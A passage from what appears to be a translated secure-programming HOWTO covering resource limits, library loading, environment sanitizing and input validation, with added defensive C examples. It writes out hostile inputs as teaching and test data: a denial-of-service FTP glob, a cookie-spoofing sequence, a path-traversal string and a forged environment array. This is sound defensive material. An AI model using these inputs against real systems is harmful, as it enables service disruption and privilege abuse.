The rlimit mechanism supports a large number of per-process quotas, such as
file size, number of child processes, number of open files, and so on. There
is a "soft" limit (also called the current limit) and a "hard" limit (also
called the upper limit). The soft limit cannot be exceeded at any time, but
through system calls it can be raised up to the value of the hard limit. See
getrlimit(2), setrlimit(2), getrusage(2), sysconf(3), and ulimit(1). Note
that there are several ways to set these limits; the PAM module pam_limits
is one of them.
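The soft/hard distinction for rlimits is best seen from inside a program. This C example is added for this edition and is not from the HOWTO; it lowers a soft limit (which the process can later raise again, up to the hard limit) and, as the security-relevant case, sets both the soft and the hard RLIMIT_CORE to zero so a program that handles secrets cannot leave them in a core file. Lowering the hard limit cannot be undone by an unprivileged process, which is the point.

```c
#include <sys/resource.h>

/* Set the soft limit of a resource, never above the hard limit. */
int set_soft_limit(int resource, rlim_t soft)
{
    struct rlimit rl;
    if (getrlimit(resource, &rl) != 0) return -1;
    rl.rlim_cur = soft > rl.rlim_max ? rl.rlim_max : soft;
    return setrlimit(resource, &rl);
}

/* Disable core dumps for good: soft and hard RLIMIT_CORE both 0. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &rl) != 0) return -1;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) return -1;   /* verify, don't assume */
    return (rl.rlim_cur == 0 && rl.rlim_max == 0) ? 0 : -1;
}

/* Demonstrate soft vs. hard on RLIMIT_NOFILE: lower the soft limit to 64
 * (or to the hard limit if that is smaller), verify it, then restore the
 * original, which is allowed because it is within the hard limit.
 * Returns 0 on success, a negative step number otherwise. */
int demo_nofile_soft_limit(void)
{
    struct rlimit saved, now;
    if (getrlimit(RLIMIT_NOFILE, &saved) != 0) return -1;
    rlim_t expect = saved.rlim_max < 64 ? saved.rlim_max : 64;
    if (set_soft_limit(RLIMIT_NOFILE, 64) != 0) return -2;
    if (getrlimit(RLIMIT_NOFILE, &now) != 0 || now.rlim_cur != expect) return -3;
    if (setrlimit(RLIMIT_NOFILE, &saved) != 0) return -4;
    return 0;
}

int main(void)
{
    return (demo_nofile_soft_limit() == 0 && disable_core_dumps() == 0) ? 0 : 1;
}
```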

 

3.7. Dynamically Linked Libraries

Practically all programs depend on libraries to execute. In most modern
Unix-like systems, including Linux, programs are by default compiled to use
dynamically linked libraries (DLLs). That way, you can update a library and
all the programs using that library will use the new (hopefully improved)
version.

Dynamically linked libraries are typically placed in one of a few special
directories. The usual directories include /lib and /usr/lib, /lib/security
for PAM modules, /usr/X11R6/lib for the X Window System, and /usr/local/lib.
You should use these standard conventions in your programs; in particular,
except during debugging you shouldn't use a value computed from the current
directory as a source for dynamically linked libraries (an attacker may be
able to add their own choice of "library" there).

There are special conventions for naming libraries and having symbolic links
for them, with the result that you can update libraries and still support
programs that want old, non-backward-compatible versions of those libraries.
There are also ways to override specific libraries, or even specific
functions in a library, when executing a particular program. This is a real
advantage of Unix-like systems over Windows-like systems; I believe
Unix-like systems have a much better system for handling library updates,
which is one reason that Unix and Linux systems are reputed to be more
stable than Windows-based systems.

On GNU glibc-based systems, including all Linux systems, the list of
directories automatically searched during program start-up is stored in the
file /etc/ld.so.conf. Many Red Hat-derived distributions don't normally
include /usr/local/lib in /etc/ld.so.conf. I consider this a bug, and adding
/usr/local/lib to /etc/ld.so.conf is a common "fix" required to run many
programs on Red Hat-derived systems. If you want to override just a few
functions in a library but keep the rest of the library, you can enter the
names of the overriding libraries (.o files) in /etc/ld.so.preload; these
"preloading" libraries take precedence over the standard set. This
preloading file is typically used for emergency patches; a distribution
usually won't include such a file when delivered. Searching all of these
directories at program start-up would be too time-consuming, so a caching
arrangement is actually used. The program ldconfig(8) by default reads the
file /etc/ld.so.conf, sets up the appropriate symbolic links in the dynamic
link directories (so they follow the standard conventions), and then writes
a cache to /etc/ld.so.cache that is used by other programs. So ldconfig has
to be run whenever a DLL is added, a DLL is removed, or the set of DLL
directories changes; running ldconfig is often one of the steps performed
by package managers when installing a library. On start-up, then, a program
uses the dynamic loader to read the file /etc/ld.so.cache and then load the
libraries it needs.

Various environment variables can control this process, and in fact there
are environment variables that permit you to override it (so, for example,
you can temporarily substitute a different library for one particular
execution). In Linux, the environment variable LD_LIBRARY_PATH is a
colon-separated set of directories where libraries are searched for first,
before the standard set of directories; this is useful when debugging a new
library or using a nonstandard library for special purposes, but be sure you
trust those who can control those directories. The variable LD_PRELOAD
lists object files with functions that override the standard set, just as
/etc/ld.so.preload does. The variable LD_DEBUG displays debugging
information; if set to "all", voluminous information about the dynamic
linking process is displayed while the program runs.

Permitting user control over dynamically linked libraries would be
disastrous for setuid/setgid programs if special measures weren't taken.
Therefore, in the GNU glibc implementation, if the program is setuid or
setgid these variables (and other similar variables) are ignored or greatly
limited in what they can do. The GNU glibc library determines whether the
program is setuid or setgid by checking the program's credentials: if the
uid and euid differ, or the gid and egid differ, the library presumes the
program is setuid/setgid (or descended from one) and therefore greatly
limits its ability to control linking. You can see this if you load the GNU
glibc source; see especially the files elf/rtld.c and
sysdeps/generic/dl-sysdep.c. This means that if you cause the uid and gid to
equal the euid and egid and then call a program, these variables will have
full effect. Other Unix-like systems handle the situation differently, but
for the same reason: a setuid/setgid program should not be unduly affected
by the environment variables set.

For Linux systems, you can get more information from my Program Library
HOWTO <http://www.dwheeler.com/program-library>.

 

3.8. Audit

Different Unix-like systems handle auditing differently. In Linux, the most
common "audit" mechanism is syslogd(8), usually working in conjunction with
klogd(8). You might also want to look at wtmp(5), utmp(5), lastlog(8), and
acct(2). Some server programs (such as the Apache web server) also have
their own audit trail mechanisms. According to the FHS, audit logs should be
stored in /var/log or its subdirectories.

 

3.9. PAM

Sun Solaris and nearly all Linux systems use the Pluggable Authentication
Modules (PAM) system for authentication. PAM permits run-time configuration
of authentication methods (for example, the use of passwords or smart
cards). See Section 10.6 for more information on using PAM. [Translator's
note: a smart card is a plastic card with an embedded IC or memory chip; in
Japan it is usually called an "IC card". Compared with a conventional
magnetic-stripe card it can not only hold far more data, but programs can
also be installed on it and executed, which is the big difference.]

 

3.10. Specialized Security Extensions for Unix-like Systems

A vast amount of research and development has gone into extending Unix-like
systems to support the security needs of various communities. For example,
several Unix-like systems have been extended to support the U.S. military's
desire for multilevel security. If you are developing software, you should
try to design it so that it can work within these extensions.

FreeBSD has a new system call, jail(2) <http://docs.freebsd.org/44doc/
papers/jail/jail.html>. The jail system call supports sub-partitioning an
environment into many virtual machines (in a sense, a "super-chroot"); its
most popular use has been to provide virtual machine services for Internet
Service Provider environments. Inside a jail, all processes (even those
owned by root) have the scope of their requests limited to the jail. When a
FreeBSD system is booted up after a fresh install, no processes are in a
jail. When a process is placed in a jail, it and any descendants of that
process are in that jail. Once in a jail, access to the file name space is
restricted in the style of chroot(2) (with the usual chroot escape routes
blocked), the ability to bind network resources is limited to a specific IP
address, the ability to manipulate system resources and perform privileged
operations is sharply curtailed, and the ability to interact with other
processes is limited to processes inside the same jail. Note that each jail
is bound to a single IP address; processes within the jail may not use any
other IP address for outgoing or incoming connections. [Translator's note: a
Japanese translation of the jail(2) manual page is at
http://www.jp.freebsd.org/cgi/mroff.cgi?subdir=man&lc=1&cmd=&man=jail&dir=jpman-5.0.0%2Fman&sect=0]

Some extensions available in Linux, such as the POSIX capabilities and the
special mount-time options discussed above, have already been covered. There
are many experiments in restricting what a Linux system can do, and their
approaches differ. The U.S. National Security Agency (NSA) has developed
Security-Enhanced Linux (Flask) <http://www.nsa.gov/selinux>, which supports
defining a security policy in a specialized language and enforcing it.
Medusa DS9 <http://medusa.fornax.sk> extends Linux with a kernel-level
user-space authorization server. LIDS <http://www.lids.org> protects files
and processes and lets the administrator "lock down" the system. The
"Rule Set Based Access Control" system RSBAC <http://www.rsbac.de> is based
on the Generalized Framework for Access Control (GFAC) by Abrams and
LaPadula and provides flexible access control through a kernel module.
Subterfugue <http://subterfugue.org> is a framework for "observing and
playing with the reality of software"; it can intercept system calls to
sandbox untrusted programs and change how they appear to behave. It works on
Linux 2.4 without kernel changes (though a kernel module may be added).
Janus <http://www.cs.berkeley.edu/~daw/janus> is a security tool for
sandboxing untrusted applications within a restricted execution
environment. User-mode Linux <http://user-mode-linux.sourceforge.net> is
another sandboxing approach, which runs "Linux on Linux". Because so many
different approaches to a security module exist, Linus Torvalds has asked
for a general-purpose approach that could support different security
policies; see http://mail.wirex.com/mailman/listinfo/linux-security-module
for more information.

There are many other extensions for security on various Unix-like systems,
but they are really outside the scope of this document.

 

Chapter 4. Validate All Input

                                     Wisdom will save you from the ways of
                                     wicked men, from men whose words are
                                     perverse...

                                                      Proverbs 2:12 (NIV)

Some inputs come from untrustworthy users, so those inputs must be
validated (filtered) before being used. You should determine what is legal
and reject anything that does not match that definition. Do not do the
reverse (identify what is illegal and write code to reject those cases),
because you are likely to forget to handle an important case of illegal
input.

There is a good reason for identifying "illegal" values, though: as a set of
tests (usually just executed in your head) to be sure that your validation
code is thorough. When I set up an input filter, I mentally attack the
filter to see if there are illegal values that could get through. Depending
on the input, here are a few examples of common "illegal" values that your
input filters may need to prevent: the empty string, ".", "..", "../",
anything starting with "/" or ".", anything with "/" or "&" inside it, any
control character (especially NIL and newline), and/or any character with
the "high bit" set (especially decimal values 254 and 255). Again, your code
should not be checking for "bad" values; you should do this check mentally
to be sure that your pattern ruthlessly limits input values to legal
values. If your pattern isn't sufficiently narrow, you need to carefully
re-examine it to see if there are other problems.

Limit the maximum character length (and the minimum length if appropriate),
and be sure not to lose control when such lengths are exceeded (see Chapter
5 for more about buffer overflows).

Here are a few common data types, and things you should validate before
using them from an untrusted user:

  * For strings, identify the legal characters or legal patterns (for
     example, as a regular expression) and reject anything not matching
     that form. There are special problems when strings contain control
     characters (especially linefeed or NIL) or metacharacters (especially
     shell metacharacters); it is often best to "escape" such metacharacters
     immediately when the input is received so that they are not passed on
     accidentally. CERT goes further and recommends escaping all characters
     that aren't in a list of characters not needing escaping [CERT 1998,
     CMU 1998]. See Section 7.3 for more information on metacharacters.

  * Limit all numbers to the minimum (often zero) and maximum allowed
     values.

  * A full email address checker is actually quite complicated, because
     there are legacy formats that greatly complicate validation if you
     need to support all of them; see mailaddr(7) and IETF RFC 822 [RFC
     822] for more information if such checking is necessary. You will
     probably do better to limit yourself to a "common" Internet address
     format. [Translator's note: IETF stands for Internet Engineering Task
     Force, the body that sets standards for Internet-related technology;
     the documents it publishes are the RFCs (Requests For Comment).]

  * Filenames should be checked; usually you will want to reject ".."
     (higher directory) as a legal value. However, this depends on the
     environment, and a few other points deserve attention. Remove any
     trailing newline (many programs leave one behind). In filenames it is
     best to prohibit any change in directory, for example by not including
     "/" in the set of legal characters. Often you shouldn't support
     "globbing", that is, expanding filenames using "*", "?", "[" (matching
     "]"), and possibly "{" (matching "}"). For example, the command "ls
     *.png" does a glob on "*.png" to list all PNG files. The C fopen(3)
     call (for example) doesn't do globbing, but the command shells perform
     globbing by default, and in C you can request globbing using (for
     example) glob(3). If you don't need globbing, just use the calls that
     don't do it where possible (e.g., fopen(3)) and/or disable it (e.g.,
     escape the globbing characters in a shell). Be especially careful if
     you want to permit globbing. Globbing can be useful, but complex globs
     can take a great deal of computing time. For example, on some ftp
     servers, a few requests like this one can easily cause a
     denial of service of the entire machine:

    ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*

     Trying to allow globbing yet limit the globbing patterns is probably
     futile. Instead, make sure that any such program runs as a separate
     process with limits on the CPU time and other resources it may
     consume. Section 6.4.8 has more information on this approach, and
     Section 3.6 has more information on setting such limits.

  * Check that a URI (URL) is legal before using it. If you handle URIs
     directly (that is, you are a web server or a program that a web server
     calls, and the request data is a URL), you must check the URI. The
     case that deserves the most attention is "escaping" from the document
     root (the part of the filesystem the server is meant to return). The
     common ways to escape the document root are ".." and symbolic links.
     Most servers check for ".." in directory names, but symbolic links
     pointing outside the document root are often overlooked. Also, don't
     forget to decode any encoding (URL encoding and UTF-8 encoding) first;
     otherwise an encoded ".." may slip through. Since URIs are assumed to
     be UTF-8 encoded, it is safest to reject URIs containing bytes with
     the high bit set altogether.

     It is also not sensible to accept URIs (URLs) that the system cannot
     handle simply because they are easy to accept. Make sure that a
     malicious user cannot insert a URI that is harmful to other users. See
     Section 4.10.4 for more information.

  * When accepting cookie values, make sure to check that the domain value
     for any cookie you use is the expected one. Otherwise, a (possibly
     cracked) related site might be able to insert spoofed cookies. Here is
     an example from IETF RFC 2965 of how failing to do this check could
     cause a problem:

       - The user agent makes a request to victim.cracker.edu and gets back
         the cookie session_id="1234", with the Domain defaulting to
         victim.cracker.edu.

       - The user agent makes a request to spoof.cracker.edu and gets back
         the cookie session-id="1111", with Domain=".cracker.edu".

       - The user agent makes a request to victim.cracker.edu again, and
         passes:

                 Cookie: $Version="1"; session_id="1234",
                         $Version="1"; session_id="1111"; $Domain=".cracker.edu"

         The server at victim.cracker.edu should detect that the second
         cookie was not one it originated, by noticing that the Domain
         attribute is not for itself, and ignore it.

Unless you account for them, the legal character patterns must not include
characters or character sequences that have special meaning to either the
program's internals or the eventual output:

  * A character sequence may have special meaning to the program's internal
     storage format. For example, if you store data (internally or
     externally) in delimited strings, make sure that the delimiters are not
     permitted data values. A number of programs store data in comma (,) or
     colon (:) delimited text files; inserting the delimiters in the input
     can be a problem unless the program accounts for it (i.e., by
     preventing it or encoding it in some way). Other characters often
     causing these problems include single and double quotes (used for
     surrounding strings) and the less-than sign "<" (used in SGML, XML, and
     HTML to indicate the beginning of a tag; this is important if you
     store data in these formats). Most data formats have an escape
     sequence to handle such cases; use it, or filter such data on input.

  * A character sequence may have special meaning if sent back out to a
     user. A common example of this is permitting HTML tags in data input
     that will later be posted to other readers (for example, in a
     guestbook or "reader comment" area). However, the problem is much more
     general. See Section 6.15 for a general discussion of the topic, and
     see Section 4.10 for a specific discussion about filtering HTML.
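As a concrete instance of "determine what is legal and reject everything else", here is a filename validator in C, written for this edition as an added example and not taken from the HOWTO. It whitelists a small character set rather than looking for bad characters, so "..", "/", a leading "." or "-", control characters (including a trailing newline), and bytes with the high bit set are all rejected without being listed individually; the 255-character ceiling is an assumption about the target filesystem.

```c
#include <string.h>
#include <stddef.h>

#define SAFE_NAME_MAX 255   /* assumed per-component limit of the target filesystem */

/* Explicit ranges instead of ctype, so the result cannot depend on the locale. */
static int is_safe_char(unsigned char c)
{
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
           (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
}

static int is_alnum_ascii(unsigned char c)
{
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9');
}

/* Returns 1 if name is a single, plain filename component made only of
 * [A-Za-z0-9._-], starting with a letter or digit, 1..255 bytes long and
 * not containing "..". Everything else (including "", ".", "..", "../x",
 * "-rf", ".hidden", "a/b", "a\nb", and any non-ASCII byte) returns 0. */
int filename_is_safe(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > SAFE_NAME_MAX)
        return 0;
    if (!is_alnum_ascii((unsigned char)name[0]))   /* no leading "." or "-" */
        return 0;
    for (size_t i = 0; i < n; i++)
        if (!is_safe_char((unsigned char)name[i]))  /* "/", controls, high-bit bytes */
            return 0;
    if (strstr(name, "..") != NULL)                 /* never a parent directory */
        return 0;
    return 1;
}

int main(void)
{
    return (filename_is_safe("report-2002_03.tar.gz") && !filename_is_safe("../etc/passwd")) ? 0 : 1;
}
```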
   
These validity tests should usually be centralized in one place, so that
they can be easily examined for correctness and maintained.

Make sure that your validity test is actually correct; this is particularly
a problem when checking input that will be used by another program (such as
a filename, email address, or URL). Often these tests have subtle errors,
producing the so-called "deputy problem" (where the checking program makes
different assumptions than the program that actually uses the data). If
there is a relevant standard, look at it, but also check whether the program
has extensions that you need to know about.

While parsing user input, it is a good idea to temporarily drop all
privileges, or even to create a separate process (with the parser having
permanently dropped privileges, and the other process performing security
checks against the parser's requests). This is especially true if the
parsing task is complex (for example, if you use a lex-like or yacc-like
tool), or if the programming language doesn't protect against buffer
overflows (for example, C and C++). See Section 6.4 for more information on
minimizing privileges.

When using data for security decisions (for example, "let this user in"), be
sure to use trustworthy channels. For example, on the public Internet,
don't just use the machine's IP address or port number as the sole way to
authenticate users, because in most environments this information can be
set by the (potentially malicious) user. See Section 6.11 for more
information.

The following subsections discuss different kinds of inputs to a program;
note that input includes process state such as environment variables, umask
values, and so on. Not all inputs are under the control of an untrusted
user, so you need only worry about those inputs that are.

 

4.1. Command Line

Many programs use the command line as an input interface, accepting input by
being passed arguments. For setuid/setgid programs, the command line data
comes from an untrusted user, so setuid/setgid programs must defend
themselves from potentially hostile command line values, as they would
against any other input. Attackers can pass essentially any data on the
command line (when invoking the program with a system call such as
execve(3)). Therefore, setuid/setgid programs must validate the command line
inputs, and they must not trust argument 0 to be the program name (an
attacker can set it to any value, including NULL).

 

4.2. Environment Variables

By default, environment variables are inherited from a process' parent.
However, when a program executes another program, the calling program can
set the environment variables to arbitrary values. This is dangerous to
setuid/setgid programs, because their invoker can completely control the
environment variables they are given. Since they are usually inherited,
this also applies transitively: a secure program might call some other
program and, without special measures, would pass potentially dangerous
environment variable values on to the program it calls. The following
subsections discuss environment variables and what to do with them.

 

4.2.1. Some Environment Variables are Dangerous

Some environment variables are dangerous because many libraries and programs
are controlled by environment variables in ways that are obscure, subtle, or
undocumented. For example, the IFS variable is used by the sh and bash
shells to determine which characters separate command line arguments. Since
the shell is invoked by several low-level calls (like system(3) and popen(3)
in C, or the backtick operator in Perl), setting IFS to an unusual value can
subvert apparently safe calls. This behavior is documented in bash and sh,
but it is obscure; many long-time users only know about IFS because of its
use in breaking security, not because it is actually used very often for its
intended purpose. What is worse is that not all environment variables are
documented, and even documented ones can be controlled to change behavior
in undocumented ways. Thus, the only real solution (described below) is to
select the variables you need and reset their values.

 

4.2.2. Environment Variable Storage Format is Dangerous

Normally, programs should use the standard access routines to access
environment variables. For example, in C you should get values using
getenv(3), set them using the POSIX standard routine putenv(3) or the BSD
extension setenv(3), and eliminate environment variables using unsetenv(3).
I should note here that setenv(3) is implemented in Linux.

However, crackers need not be so nice; crackers can directly control the
environment variable data area passed to a program using execve(2). This
permits some nasty attacks, which can only be understood by understanding
how environment variables really work. In Linux, you can see environ(5) for
a summary of how environment variables really work. In short, environment
variables are internally stored as a pointer to an array of pointers to
characters; this array is stored in order and terminated by a NULL pointer
(so you know when the array ends). The pointers to characters, in turn,
each point to a NIL-terminated string of the form "NAME=value". This has
several implications; for example, environment variable names can't include
the equal sign, and neither the name nor the value can have embedded NIL
characters. However, a more dangerous implication of this format is that it
allows multiple entries with the same variable name but different values
(for example, more than one value for SHELL). While typical command shells
prohibit doing this, a locally executing cracker can create such a
situation using execve(2).

The problem with this storage format (and the way it is set) is that a
program might check one of these values (to see if it is valid) but actually
use a different one. In Linux, the GNU glibc libraries try to shield
programs from this problem: glibc 2.1's implementation of getenv always
gets the first matching entry, setenv and putenv always set the first
matching entry, and unsetenv actually unsets all of the matching entries
(congratulations to the GNU glibc implementers for implementing unsetenv
this way!). However, some programs go directly to the environ variable and
iterate across all environment variables; in this case, they might use the
last matching entry instead of the first one. As a result, if the checks
were made against the first matching entry but the program used the last
matching entry, a cracker could subvert the protection routines.

 

4.2.3. The Solution - Extract and Erase

For secure setuid/setgid programs, the short list of environment variables
needed as input (if any) should be carefully extracted. Then the entire
environment should be erased, followed by resetting a small set of
necessary environment variables to safe values. There really isn't a better
way if you make any calls to subordinate programs; there is no practical
method of listing "all the dangerous values". Even if you reviewed the
source code of every program you call directly or indirectly, someone may
add new undocumented environment variables after you write your code, and
one of them may be exploitable.

The simple way to erase the environment in C/C++ is to set the global
variable environ to NULL. The global variable environ is defined in
<unistd.h>; C/C++ users will want to #include this header file. You will
need to manipulate this value before spawning threads, but that is rarely a
problem, since you want to do these manipulations very early in the
program's execution (usually before any threads are spawned).

The global variable environ is defined in various standards; it is not
clear that the official standards condone directly changing its value, but
I am unaware of any Unix-like system that has trouble with doing this. I
normally just modify "environ" directly; manipulating such low-level
components is possibly non-portable, but it assures you that you get a
clean (and safe) environment. In the rare case where you need later access
to the entire set of variables, you could save the value of "environ"
somewhere, but this is rarely necessary; nearly all programs need only a
few values, and the rest can be dropped.

Another way to clear the environment is to use the undocumented clearenv()
function. The function clearenv() has an odd history: it was supposed to be
defined in POSIX.1, but never made it into that standard. However,
clearenv() is defined in POSIX.9 (the Fortran 77 bindings to POSIX), so
there is a quasi-official status for it. In Linux, clearenv() is defined in
<stdlib.h>, but before using #include to include it you must make sure that
__USE_MISC is #defined. A simple way of doing this is to #define
_SVID_SOURCE or _BSD_SOURCE before #include <features.h>; these are the
feature test macros that define __USE_MISC.

One environment value you will almost certainly re-add is PATH, the list of
directories to search for programs; PATH should not include the current
directory and should usually be something simple like "/bin:/usr/bin".
Typically you will also set IFS (to its default of " \t\n", where space is
the first character) and TZ (timezone). Linux won't die if you don't supply
either IFS or TZ, but some System V based systems have problems if you
don't supply a TZ value, and it is rumored that some shells need the IFS
value set. In Linux, see environ(5) for a list of common environment
variables that you might want to set.

If you really need user-supplied values, check the values first (to ensure
that the values match a pattern for legal values and that they are within
some reasonable maximum length). Ideally there would be some standard
trusted file in /etc with the information for "standard safe" environment
values, but at this time there is no standard file defined for this
purpose. For something similar, you might want to examine the PAM module
pam_env on those systems which have that module.

If you are using a shell as your programming language, you can use the
"/usr/bin/env" program with the "-" option (which erases all environment
variables of the program being run). Basically, you call /usr/bin/env, give
it the "-" option, follow that with the set of variables and their values
you wish to set (as name=value), and then follow that with the name of the
program to run and its arguments. You usually want to call the program
using the full pathname (/usr/bin/env) and not just as "env", in case a
user has created a dangerous PATH value. Note that GNU's env also accepts
the options "-i" and "--ignore-environment" as synonyms (they also erase
the environment of the program being started), but these aren't portable to
other versions of env.

If you are programming a setuid/setgid program in a language that doesn't
allow you to reset the environment directly, one approach is to create a
"wrapper" program. The wrapper sets the environment to safe values and then
calls the other program. Beware: make sure the wrapper will actually invoke
the intended program; if it is an interpreted program, make sure there is
no race condition possible that would allow the interpreter to load a
different program than the one that was granted the setuid/setgid
privileges.
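The two previous subsections describe a problem (duplicate "NAME=value" entries, programs walking environ themselves) and its cure (extract, erase, rebuild). The C code below, an added example for this edition and not from the HOWTO, does both: count_duplicate_env_names() shows what a hostile execve(2) caller can put in the array, and sanitize_environment() keeps only TZ (and only if it passes a whitelist), sets environ to NULL, then re-adds PATH and IFS with safe values. It assumes glibc, where setenv() works on an environment that has been emptied this way.

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Length of the NAME part of "NAME=value" (whole string if no '='). */
static size_t env_name_len(const char *entry)
{
    const char *eq = strchr(entry, '=');
    return eq ? (size_t)(eq - entry) : strlen(entry);
}

/* The storage format allows the same name several times. Count the entries
 * whose name already appeared earlier in envp. */
int count_duplicate_env_names(char *const envp[])
{
    int dups = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        size_t ni = env_name_len(envp[i]);
        for (size_t j = 0; j < i; j++) {
            if (env_name_len(envp[j]) == ni && strncmp(envp[i], envp[j], ni) == 0) {
                dups++;
                break;
            }
        }
    }
    return dups;
}

/* A value is acceptable only if it is short and built solely from the
 * allowed characters (a whitelist, not a blacklist). */
int env_value_is_sane(const char *value, size_t maxlen, const char *allowed)
{
    size_t n = strlen(value);
    return n <= maxlen && strspn(value, allowed) == n;
}

/* Extract-and-erase. Returns the number of variables in the rebuilt
 * environment (2, or 3 if a sane TZ was carried over), or -1 on error. */
int sanitize_environment(void)
{
    static const char tz_allowed[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/_+-:";
    char tz[64] = "";

    const char *v = getenv("TZ");            /* glibc: the FIRST matching entry */
    if (v != NULL && env_value_is_sane(v, sizeof tz - 1, tz_allowed))
        strcpy(tz, v);                       /* copy before erasing */

    environ = NULL;                          /* LD_PRELOAD, IFS, NLSPATH, ... all gone */

    if (setenv("PATH", "/bin:/usr/bin", 1) != 0) return -1;   /* no "." in PATH */
    if (setenv("IFS", " \t\n", 1) != 0) return -1;             /* space first */
    if (tz[0] != '\0' && setenv("TZ", tz, 1) != 0) return -1;

    int n = 0;
    for (char **e = environ; e != NULL && *e != NULL; e++)
        n++;
    return n;
}

int main(void)
{
    /* Constructed hostile array: SHELL and IFS each appear twice. */
    char *hostile[] = { "SHELL=/bin/sh", "PATH=/bin", "SHELL=/tmp/evil",
                        "IFS=x", "IFS= \t\n", NULL };
    if (count_duplicate_env_names(hostile) != 2) return 1;
    return sanitize_environment() >= 2 && getenv("LD_PRELOAD") == NULL ? 0 : 1;
}
```

Do this before any thread is created and before calling any library that caches environment values; after it, every subordinate program you run inherits only the handful of variables you chose.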

 

4.3. File Descriptors

A program is passed a set of "open file descriptors", that is, pre-opened
files. A setuid/setgid program must deal with the fact that the user gets to
select which files are open and what they refer to (within the user's
permission limits). A setuid/setgid program must not assume that opening a
new file will always open into a fixed file descriptor number, or that the
open will succeed at all. It must also not assume that standard input
(stdin), standard output (stdout), and standard error (stderr) refer to a
terminal, or are even open.

The rationale behind this is easy; since an attacker can open or close a
file descriptor before starting the program, the attacker could create an
unexpected situation. If the attacker closes standard output, then when the
program opens its next file that file will be opened as though it were
standard output, and the program will then send all of its standard output
to that file as well. Some C libraries will automatically open stdin,
stdout, and stderr (to /dev/null) if they aren't already open, but this
isn't true on all Unix-like systems.
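The closed-descriptor trick relies on open(2) returning the lowest free descriptor. The usual defense, shown below in C as an added example for this edition (not from the HOWTO), is to check descriptors 0, 1 and 2 at start-up and point any closed one at /dev/null before the program opens anything else; the demonstration closes stdout, repairs it, and restores the original afterwards.

```c
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

/* Make sure descriptors 0, 1 and 2 are open, pointing any closed one at
 * /dev/null so that a later open() cannot land on them. Returns the number
 * of descriptors repaired, or -1 on failure. Call this before any other
 * open(), ideally as the first thing in main(). */
int ensure_standard_fds_open(void)
{
    int repaired = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1)
            continue;                         /* already open */
        if (errno != EBADF)
            return -1;
        int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nfd != fd) {                      /* lowest-free rule: must be fd itself */
            if (nfd >= 0) close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

/* Demonstration: close stdout as an attacker would, repair, then put the
 * original stdout back. Returns the number of descriptors repaired (1). */
int demo_repair_closed_stdout(void)
{
    int saved = dup(1);
    if (saved < 0) return -1;
    close(1);
    int repaired = ensure_standard_fds_open();   /* /dev/null now occupies fd 1 */
    dup2(saved, 1);                              /* restore the real stdout */
    close(saved);
    return repaired;
}

int main(void) { return demo_repair_closed_stdout() == 1 ? 0 : 1; }
```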

 

4.4. File Contents

If a program takes directions from a file, it must not trust that file
specially unless only a trusted user can control its contents. Usually this
means that an untrusted user must not be able to modify the file, its
directory, or any of its ancestor directories. Otherwise, the file must be
treated as suspect.

If the directions in the file are supposed to come from an untrusted user,
then make sure that the inputs from the file are protected as described
throughout this document. In particular, check that values match the set of
legal values, and that buffers are not overflowed.

 

4.5. Web-Based Application Inputs (Especially CGI Scripts)

Web-based applications (such as CGI scripts) run on some trusted server and
must get their input data somehow through the web. Since the input data
generally comes from untrusted users, it must be validated. Indeed, this
information may actually have come from an untrusted third party; see
Section 6.15 for more information. For example, CGI scripts are passed this
information through a standard set of environment variables and through
standard input. The rest of this text will specifically discuss CGI, because
it is the most common technique for implementing dynamic web content, but
the general issues are the same for most other dynamic web content
techniques.

One additional complication is that many CGI inputs are provided in
so-called "URL-encoded" format, that is, some values are written in the
form %HH where HH is the hexadecimal code for that byte. You or your CGI
library must handle these inputs correctly by URL-decoding the input and
then checking whether the resulting byte value is acceptable. You must
correctly handle all values, including problematic values such as %00 (NIL)
and %0A (newline). Don't decode inputs more than once, or input such as
"%2500" will be mishandled (the %25 would be translated to "%", and the
resulting "%00" would then be erroneously translated to the NIL character).

CGI scripts are commonly attacked by including special characters in their
inputs; see the comments above.

Another form of data available to web-based applications are "cookies".
Again, users can provide arbitrary cookie values, so they cannot be trusted
unless special precautions are taken. Also, cookies can be used to track
users, potentially invading user privacy. As a result, many users disable
cookies, so if possible your web application should be designed so that it
does not require the use of cookies (but see my later discussion for when
you must authenticate individual users). I encourage you to avoid or limit
the use of persistent cookies (cookies that last beyond the current
session), because they are easily abused. Indeed, U.S. agencies are
currently forbidden to use persistent cookies except in special
circumstances, because of the concern about invading user privacy; see the
OMB guidance in memorandum M-00-13 (June 22, 2000)
<http://cio.gov/files/lewfinal062200.pdf>. Note that to use cookies, some
browsers may insist that you have a privacy profile (named p3p.xml in the
root directory of the server).

Some HTML forms include client-side input checking to prevent some illegal
values; these checks are typically implemented using Javascript/ECMAscript
or Java. This checking can be helpful for the user, since it can happen
"immediately" without requiring any network access. However, this kind of
input checking is useless for security purposes, because attackers can send
such "illegal" values directly to the web server without going through the
checks. It is not even hard to subvert this; you don't have to write a
program to send arbitrary data to a web application. In general, servers
must perform all their own input checking (of form data, cookies, and so
on) because they cannot trust clients to do this securely. In short,
clients are generally not "trustworthy channels". See Section 6.11 for more
information on trustworthy channels.

A brief discussion of input validation with some specifics of Microsoft's
Active Server Pages (ASP) is available from Jerry Connolly at
http://heap.nologin.net/aspsec.html.
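The "%2500" case above is worth seeing in code. This C decoder is an added example for this edition, not part of the HOWTO or any CGI library: it decodes application/x-www-form-urlencoded input exactly once, treats "+" as a space, rejects malformed escapes, and rejects any decoded control character (so %00, %0A and %0D are refused rather than silently passed on). Decoding "%2500" therefore yields the three literal characters "%00", which is what the sender wrote; a second decoding pass is the bug, so there is none.

```c
#include <stddef.h>
#include <string.h>

static int hexval(int c)
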